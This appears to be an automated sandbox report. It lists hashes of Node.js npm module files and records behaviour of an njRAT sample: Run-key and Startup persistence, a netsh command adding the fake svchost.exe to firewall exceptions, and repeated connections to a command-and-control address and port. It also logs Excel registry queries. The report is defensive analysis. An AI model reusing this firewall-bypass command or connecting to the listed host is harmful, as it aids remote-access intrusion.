| SHA256 | cdeb57ca548c8dcf28f9546f202763f9b03e555046476d213d571c6cb7a59a43 |
| SHA512 | f30abcb6532c81e6dc3ac10ca408a32df89e0af72cdceabbbf0efecab38bdc5dae6c65f6cf861eb2e9f0ea6c20f1abb24a64989003a0fff16778b7ad2f24fa66 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\readable-browser.js
| MD5 | dd3f26ae7d763c35d17344a993d5eeb5 |
| SHA1 | 020ce7510107d1cd16fd15e8abef18fd8dee9316 |
| SHA256 | d9c3473b418fbf6103aa34c716fa9d8df7ad1cf5900dac48301dc3e8ea6139ae |
| SHA512 | 65103f629bc2c7a36e804e01ad05c7fe4ae8239adad8e7965c6559be20f2c38fe30d4729de950478d4a2184c88f9f9ccba5d0b459742ac33a99f0abb37e42400 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\passthrough.js
| MD5 | 622c2df3803df1939b1ee25912db4454 |
| SHA1 | 83be571f59074a357bf8fe50b90c4ad21412bd43 |
| SHA256 | cfbb763646dda37e1434a5ebc4691fca75b0694b8d89505420ba3d7d489241e6 |
| SHA512 | 09a74ea5daac0d11883ae003b228784588244c1f4501e5eb41ffcc957c32587d3458e0ada1e56b47c983808fe5f9b8265dcede5a88c6642a5716a1f9a39432ee |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\LICENSE
| MD5 | d816ace3e00e1e8e105d6b978375f83d |
| SHA1 | 31045917a8be9b631ffb5b3148884997b87bd11a |
| SHA256 | b7cd4c543903a138ba70beef889be606adceefa1359f858670d52d1865127e24 |
| SHA512 | 82c9105602008647c8381bf4996742441fb1c98f5dd91dc85fa0d166686cb1294c47ba18b93da25ee46adf5135a29ab3d0dcadd0a50c6d1e32b5d401b9ca0f9d |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\_stream_writable.js
| MD5 | 31f2f1a4a92b8e950faa990566d9410b |
| SHA1 | 3b3f157c3ae828417dd955498f9d065f5b00b538 |
| SHA256 | 7262ec523f9247b6a75f5e10c5db82e08cfe65acc49f9c96fcb67f68c5a41435 |
| SHA512 | c604bb3465ae2e2dea8c8977796a15b76657db0d791d0d67ccf727ad4dd9209efc2fd5ca4a7e15d8931c50d786273d0ae9eadd0c6c5778cac309cb6a81f10a4e |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\_stream_transform.js
| MD5 | 54be917915eb32ae9b4a71c7cc1b3246 |
| SHA1 | 82a2a3af2ac3e43475ab0e09e6652f4042e12c57 |
| SHA256 | 75aabc0acf662f0cfa187ea79437b1ca4edac342b6995fe6038d171e719d3613 |
| SHA512 | 40312c18fea85f62a09e55366230847cb5c7f30535cb123b13f9fc71468278076b325958cc138c57c7958c97a3e98f5500c9da4bc4b1b3edf8aa0519d1e4b955 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\string_decoder\lib\string_decoder.js
| MD5 | 81fc92e6c5299a2a99c710a228d3299b |
| SHA1 | 8ef7f95a46766ff6e33d56e5091183ee3a1b1eea |
| SHA256 | 00fd7780ba199a984bbc1f35875017ae26fb8e48ef6e3e4b11fcf0954478e0fb |
| SHA512 | c2ba9ba55784e4a89cfcd644232654a32bb43c20f7a916d69ef4e65f9b88810813432531e3812a93f4686ab103676976a6deb78f39f3380350107991938b4a6a |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\_stream_readable.js
| MD5 | 7bca08c5eeade583afb53df46a92c42b |
| SHA1 | ccc5caa24181f96a1dd2dd9244265c6db848d3f7 |
| SHA256 | 46ca457378727959f5d2214955c03de665a22c644ddb78c568e925f725ed7e84 |
| SHA512 | 0ef7813e335cbf06e8963cca10b24a28363284446f0f7bcee7751111e6eb098df6ff286ac6ae9b0f312d11e117e69d19b8d96f47d6566568212b7a5d6eb085b7 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\_stream_passthrough.js
| MD5 | 41247801fc7f4b8f391bc866daf2c238 |
| SHA1 | d858473534bfbd539414b9e3353adfc255eed88b |
| SHA256 | d5e328cb2e044902c3ace9da8d277298b04bcb4046bcd5a4cd3d701e56497d6c |
| SHA512 | c9197747ddc57818474c861e4ce920a98a5d0a32589ef2d08fd37320daac2400512b23b51cbb89999fca1ca17f375daf3453ced8e2a5e9aa538a371f31f5561b |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\_stream_duplex.js
| MD5 | 63b92584e58004c03054b4b0652b3417 |
| SHA1 | 67efe53912c6d4cdeb00227deb161fe0f13e5bfb |
| SHA256 | 76d5dc9dcae35daa0a237fe11ef912b89dcf25c790f4d6ba1eadc2c97e8dad4c |
| SHA512 | ca5ada5a9b0070ee9eaa1b70e3690fae1880a77bafc050c24019fd28c90bb98479237e0dfd9209994e1e44617f8dd2f7aa75133a6e1a034c18ae55504f076837 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\internal\streams\stream.js
| MD5 | a391c874badff581abab66c04c4e2e50 |
| SHA1 | 7b868ed96844e06b284dbc84e3e9db868915203c |
| SHA256 | 783e5e798a19dde6981db840cad5a2bfbf0822dd2819fe14c54a1f4e71f0d363 |
| SHA512 | cb9ef0ef02515f0a9c6c57fed7e5ed6c9c36cfbe80ad1d4d2554a63e8a4ea106d5b04376a587fe10dca6101474e5890623517bd68558a63d33e0c3569ee62866 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\internal\streams\stream-browser.js
| MD5 | 46b005ecbd876040c07864736861135f |
| SHA1 | c4229c3c10949c67a6cbc9d4c57d3cc1c848edb3 |
| SHA256 | 0406c41a3dc088c309a3efb822e145bb78856668bd60d16b66b637f4dbf2a1ba |
| SHA512 | 533d688ca138bca4610f7a03a80d79ff88d922fda4a230504d698d45ee1c6e4a609f1eeaf8cb073866e9d91963adececc8d00412e85b37706bcca3957c265803 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\internal\streams\destroy.js
| MD5 | a4607210c0c5e058d5897a6f22ac0a6c |
| SHA1 | 11c94e733b2230731ee3cd30c2c081090ffa6835 |
| SHA256 | 713e5bac5e10b8d0940eda803835c50da6ef1373f1e7b872b063373069129377 |
| SHA512 | 86e2223c3da2eda2c4fedc2e162bb91fef0c8b6ab0e0f1136b73c8c992f736e6e5d330f2352acbf43b02b9a4d26a8a8ae06c642135ab70b82364dce3e2903871 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\internal\streams\BufferList.js
| MD5 | 99511811073f43563c50a7e7458d200b |
| SHA1 | b131b41c8aa9ae0bfce1b0004525771710bc70a4 |
| SHA256 | b404455762369e9df0542e909dbda88df308d53f6abbac0b8f8c0b727e848a74 |
| SHA512 | 79b64079ef2cc931fb7c333a3438a48b9b0f41aa61087fe2850b050a9d1537a9d410eab3a27d49f1b994ff8e949c488d0f9a8f7f9b1503c1c32b49cca81e85a5 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\GOVERNANCE.md
| MD5 | b5cdc063fe6b17a632d6108eefec147e |
| SHA1 | ffc13a639880de3c122d467aabb670209cc9542c |
| SHA256 | 7366d24a6cd0b904b2a34b7a4c8a8f62fc855605ed0ab4030cbee5a9304f94e7 |
| SHA512 | 7ff8dab3bb67b5685335b657fcb0b901851ffbd49f25773543e34fd31c81ae19ef62386f06a5e9881428cbfbe29d7ca041558178d73f4f1cbc31cbcc7eaac388 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\duplex.js
| MD5 | 1a2977043a90c2169b60a5991599fc2a |
| SHA1 | 27c20fc801b9851e37341ec9730d0fbc9c333593 |
| SHA256 | 8c1a1af19eaf01f960e9dc5fc35fbcb0e84060d748883866e002b708231b46ac |
| SHA512 | 5f233cf6dd4a82365c130daf1902f9deacf7a76999caf01ad8de9308097bb9dd6d9795836419dfbc07e50055915404c720dc1bb5aa28a463ca1117f52c81b614 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\duplex-browser.js
| MD5 | 276ae60048c10d30d8463ac907c2fcec |
| SHA1 | be247923f7e56c9f40905f48dc03c87f0aeb4363 |
| SHA256 | bf30af3ba075b80a9eaf05ba5e4e3e331e8a9b304ccb10b7c156aa8075f92f44 |
| SHA512 | e3f8c1a038aaf84f0c6b94e2c7fc646844754cc3d951683784182bd90bacc56e0c2f0f1a4be16ea2e5218f44d0f7f6ad00dcec72eb4c0e6eeb4176535587e890 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\string_decoder\LICENSE
| MD5 | 48ab8421424b7cacb139e3355864b2ad |
| SHA1 | 819a1444fb5d4ea6c70d025affc69f9992c971c9 |
| SHA256 | 9d364120560d6770fd7e663d23311f871c2c597327cd4c1fced97dbab25183f4 |
| SHA512 | b6029a0f811c1c8fbdd9d57cdc16ff469cc8a023468a0390643270ffe21774de02cd950908355df71ed95d2b7c27387478f88cb1fd23d84b45c47a97364edf15 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\doc\wg-meetings\2015-01-30.md
| MD5 | fda6b96a1cac19d11bcdee8af70e5299 |
| SHA1 | 449cff987f8b8d79b53c9ab93a7dc18f6d6f3ca8 |
| SHA256 | b5108c42d95185b1b71e86963bf784ddfd123da4178d41cef052be08c6429cb6 |
| SHA512 | f6483ffffc8a71a583d70fe6c4bf001a95f9c8a6b4e70fa0e322f2008170144794ddb42a396fb694b8039cb4a572a655ff877dd95d3ac95b6f6aafeab390a670 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\from2\node_modules\string_decoder\README.md
| MD5 | a92ecc29f851c8431af9a2d3f0555f01 |
| SHA1 | 06591e3ff094c58b1e48d857efdadb240eafb220 |
| SHA256 | 6b8a003975a1c056caee0284b9e1930192cac1bd0ea2181f594290057d2c0687 |
| SHA512 | 347ae85c821e06ba6e239ec2230c52dee6ca68ab52ccf9f57067e7152b9be0f832d4bbc7f30ffd4784427a81c0797af8b46bce8b4ab9fc0843f6424676a64b5c |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\fs-minipass\LICENSE
| MD5 | b020de8f88eacc104c21d6e6cacc636d |
| SHA1 | 20b35e641e3a5ea25f012e13d69fab37e3d68d6b |
| SHA256 | 3f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706 |
| SHA512 | 4220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\gentle-fs\node_modules\iferr\.npmignore
| MD5 | 2e5243fbad9b5b60464b4e0e54e3f30b |
| SHA1 | d644bb560260a56300db7836367d90ac02b0d17c |
| SHA256 | cd429484a9e55b1df61764740f7153c476037c791b9dabac344bcce552a45080 |
| SHA512 | a540facc5bcc4eb5bb082bc3b3ce76a3275ebd284ffa1c210ab6e993d5c868c748b2248cb921a3fe449930cb2f16e18120409000e1f916d4abdfd72b77a5799f |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\is-symbol\Makefile
| MD5 | b8bbbc01d4cbf61a2a5d764e2395d7c9 |
| SHA1 | 48fa21aa52875191aa2ab21156bb5a20aed49014 |
| SHA256 | 4586074dc6c5129837eb6cde39a21fc30e251c498e9fcc8fc0c8076a3af97e86 |
| SHA512 | ac8ceb376dbc14addca0f63b787ed24989608911fca520ab7ce88a01f0c639cf24e9f3a0bb75e972886a46b1c5715342532817d0bebb6e339d21857b0f1da3d1 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\libnpmsearch\PULL_REQUEST_TEMPLATE
| MD5 | 06128b3583815726dcdcc40e31855b0d |
| SHA1 | c93f36d2cd32221f94561f1daac62be9ccfb0bc9 |
| SHA256 | 0d2e3b0d2c6a52197998a5e9345dbb7622e5a8542dcd1ed7d76a5101293d00f0 |
| SHA512 | c7babf81f0206223f0da838285871e0ea145c6335575b19d60a52eecaa13f9b6e635bd294a62c8f09d9f52236127ee721814118817775d03a656e67537ebfbec |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\libnpmteam\appveyor.yml
| MD5 | c75fff3c7388fd6119578b9d76a598be |
| SHA1 | 3b4a13ed37307d560b8b4b631f4debacc7b0d19c |
| SHA256 | 8c9537e3c45610f99f3869f6b40a1bfc7c0ae82f72534e9ed0730cd9deb2a4bd |
| SHA512 | 9c7d033d70dd8cd360cc5df12bc7bc911fe4c7b626fb1353c3dd6e42d0583f7c0c7f33b3668a90e52dd0c5b4efc87c219005e91513854a98e18138119fd2b0a2 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\libnpmteam\.travis.yml
| MD5 | f51eed7ed699afb51054b11328ea78cf |
| SHA1 | 8b68fb74f59a6288ad5c71aee221f7e86c169532 |
| SHA256 | fa37bf69fa66e3475a1d499059ff372be0e136e41923c8d6fb407f649a4cb472 |
| SHA512 | f7a4ef776fa2e53f46f0b032f0359555422e8729c855b0822cae8f464e49e7f9a453514ce08ec4e5d7a3d02909e40e6771d7bffa1f54ed6f0d2f6ebaeb59b02b |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\libnpmsearch\LICENSE
| MD5 | 072ac9ab0c4667f8f876becedfe10ee0 |
| SHA1 | 0227492dcdc7fb8de1d14f9d3421c333230cf8fe |
| SHA256 | 2ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013 |
| SHA512 | f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\libnpx\LICENSE.md
| MD5 | e9dc66f98e5f7ff720bf603fff36ebc5 |
| SHA1 | f2b428eead844c4bf39ca0d0cf61f6b10aeeb93b |
| SHA256 | b49c8d25a8b57fa92b2902d09c4b8a809157ee32fc10d17b7dbb43c4a8038f79 |
| SHA512 | 8027d65e1556511c884cb80d3c1b846fc9d321f3f83002664ad3805c4dee8e6b0eaf1db81c459153977bdbde9e760b0184ba6572f68d78c37bff617646bcfc3b |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\lodash._baseuniq\LICENSE
| MD5 | a3a97c2bfdbd1edeb3e95ee9e7769d91 |
| SHA1 | 3e5fd8699e3990171456a49bba9e154125fd5da1 |
| SHA256 | 3e0f669f0550e6101efcc81d9032af5498b72eec499df58cfbf63e24a61e2f75 |
| SHA512 | 7c7d273148f0f3b2e64e16d0164140540a5a02dcb1574a7ec3a53c0ee5acd88810a68e65ea80fd26c1896abab6d65c2b3e738423d44f226cdba1b3dc784512fe |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\lodash._getnative\LICENSE
| MD5 | 26c80e27b277fdd0678be3bd6cd56931 |
| SHA1 | 148865ccd32e961df8aedd4859840eac4130364a |
| SHA256 | 34c9e87365128252851b101ae194a31e3d019724b20c25fa66fd4521a326c818 |
| SHA512 | b727fcfb6d09d74fc344f361a5f19e7e679166c5c5bc0666c66fc7599908b3c4aa24f4e4da18948a41ade67d23a908ac27b564b4261ab890a543d8aadb4fc3be |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\minimist\LICENSE
| MD5 | a6df4eaa6c6a1471228755d06f2494cf |
| SHA1 | b7d2d5450231d817d31b687103065ac090e955ab |
| SHA256 | a9ecf3da3825b3e7232f29c970a2869bb1752c900bd75ba7cbabeb69b8f032b4 |
| SHA512 | 340a980d3cbe1fae476b27dce893a707b40d8db4c35a3d5cb0e8a907bb8792e06dc50f23ce4abd50a35f18fa74e20caf92e142de4100fb2c5a5e58d5152800b9 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\move-concurrently\node_modules\aproba\LICENSE
| MD5 | 9ea8c9dc7d5714c61dfdaedcc774fb69 |
| SHA1 | 5ea7b44b36946359b3200e48de240fe957ee70f1 |
| SHA256 | 1b94c9898885c681c1e0ebbf96494e49662842f88ac1e4dd8ffad0ac047108ae |
| SHA512 | 0401c416464818fcaadd6e156ce92c28448e990765ddb7d0097b0c30ea9c8a5d862a53a94fd4a0adb502db1e3abe445c08f18e6fcccbb9f70fcbab273a938e60 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\move-concurrently\node_modules\aproba\README.md
| MD5 | 675a05085e7944bc9724a063bc4ed622 |
| SHA1 | e1ec3510f824203542cac07fd2052375472a3937 |
| SHA256 | da325e3fe4425fc89c9a474ae18eea542f5787151c92bb2aba9dc99de596cfa1 |
| SHA512 | a9512b09f95cc79594f29590468197d4deb53fcfc03fd13f3a5b864ca57a5fec6c62879ce32699547ac1d2aae0bbb4d681484e7236d5a804093c788e33d67a61 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\npm-bundled\LICENSE
| MD5 | 1d7c74bcd1904d125f6aff37749dc069 |
| SHA1 | 21e6dfe0fffc2f3ec97594aa261929a3ea9cf2ab |
| SHA256 | 24b8d53712087b867030d18f2bd6d1a72c78f9fb4dee0ce025374da25e4443b9 |
| SHA512 | b5ac03addd29ba82fc05eea8d8d09e0f2fa9814d0dd619c2f7b209a67d95b538c3c2ff70408641ef3704f6a14e710e56f4bf57c2bb3f8957ba164f28ee591778 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\object.getownpropertydescriptors\.editorconfig
| MD5 | db5ae3e08230f6c6a164bc3747f9863e |
| SHA1 | c02bb3a95537ea2a0ba2f0d3a34fb19e57154399 |
| SHA256 | 2dc461c2ca14c593ed13101958988e6e5d6944144bb3f8f70631eb96365e9f1e |
| SHA512 | ffd68aaec13ad5910dd5f1c17c7a062d06fffc09db7ab31627fcfd223fa99ec7544103db98e2462b9f2b769984b1dfe1e787dec2814ab1daf465a75320c53a3c |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\object.getownpropertydescriptors\LICENSE
| MD5 | e495b6c03f6259077e712e7951ade052 |
| SHA1 | 784d6e3e026405191cc3878fa6f34cb17f040a4d |
| SHA256 | 5836b658b3a29bfc790f472bf6b5a5dfdf08789285c2a50dd43901d5733691db |
| SHA512 | 26f124b803587bd76ac1084ccb759a8a82841d2122fa7be671413434df532e4c7c43442d06a4626f134f96a091eb6d09146bcad731c4053552f4079fd5708a63 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\pump\LICENSE
| MD5 | 713e86b5fbba64b71263283717ef2b31 |
| SHA1 | a96c5d4c7e9d43da53e1a48703e761876453b76c |
| SHA256 | c222d7cd6879fb81d79a019383a6f651107d76f1f75b2632c438828b1a08c227 |
| SHA512 | 64e4d6383e531446ab4851103f49621fc787c6f506e417e55ab2c1ddb66e3abc3d69edd717f6269169211bf52b632bebe29daa6925b10d3b6fd8d07aa0f87c5f |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\run-queue\node_modules\aproba\index.js
| MD5 | d7adafc3f75d89eb31609f0c88a16e69 |
| SHA1 | 974e1ed33c1ea7b016a61b95fed7eccadcf93521 |
| SHA256 | 8059de4e00e45bad48e09ae5eec5476740b2462fbd913dcc0a055dfa73dd533a |
| SHA512 | b534aa9e922e26448a9c592b98111572074ce50768f8dedd8f1c1449652b8e20997138259ec14bafcc0cba0afaa2e4aab21c6e73c84107472ab946c3ea16d7b9 |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\slide\LICENSE
| MD5 | 7428aa9f83c500c4a434f8848ee23851 |
| SHA1 | 166b3e1c1b7d7cb7b070108876492529f546219f |
| SHA256 | 1fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7 |
| SHA512 | c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce |
C:\Users\Admin\node-v14.12.0-win-x64.tmp498948416180\node-v14.12.0-win-x64\node_modules\npm\node_modules\tunnel-agent\LICENSE
| MD5 | 781a14a7d5369a78091214c3a50d7de5 |
| SHA1 | 2dfab247089b0288ffa87c64b296bf520461cb35 |
| SHA256 | c3613146372a1d5b88c5215439f22f2ba271c1f6284133bbea37887b078fd5de |
| SHA512 | ce5173d8ebe3d455d204e7471a86c80a98c31c94e632a2c367f342e46942f554beba8729f7fe21e968a0710b4c2d00e5af6fd53306bbef12e93ee66682d709ba |
memory/3492-4280-0x000001B8483C0000-0x000001B8483C1000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
158s
Command Line
Signatures
Njrat family
njRAT/Bladabindi
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6825da1e045502b22d4b02d4028214ab.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6825da1e045502b22d4b02d4028214ab.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6825da1e045502b22d4b02d4028214ab = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\" .." | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6825da1e045502b22d4b02d4028214ab = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\" .." | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2404 wrote to memory of 3240 | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | C:\Windows\SysWOW64\netsh.exe |
| PID 2404 wrote to memory of 3240 | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | C:\Windows\SysWOW64\netsh.exe |
| PID 2404 wrote to memory of 3240 | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | C:\Windows\SysWOW64\netsh.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLE
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| TH | 43.229.151.64:5552 | tcp | |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| TH | 43.229.151.64:5552 | tcp | |
| US | 8.8.8.8:53 | 86.49.80.91.in-addr.arpa | udp |
| TH | 43.229.151.64:5552 | tcp | |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| TH | 43.229.151.64:5552 | tcp | |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| TH | 43.229.151.64:5552 | tcp | |
| TH | 43.229.151.64:5552 | tcp | |
| TH | 43.229.151.64:5552 | tcp |
Files
memory/2404-0-0x00000000747F2000-0x00000000747F3000-memory.dmp
memory/2404-1-0x00000000747F0000-0x0000000074DA1000-memory.dmp
memory/2404-5-0x00000000747F2000-0x00000000747F3000-memory.dmp
memory/2404-6-0x00000000747F0000-0x0000000074DA1000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
144s
Max time network
154s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
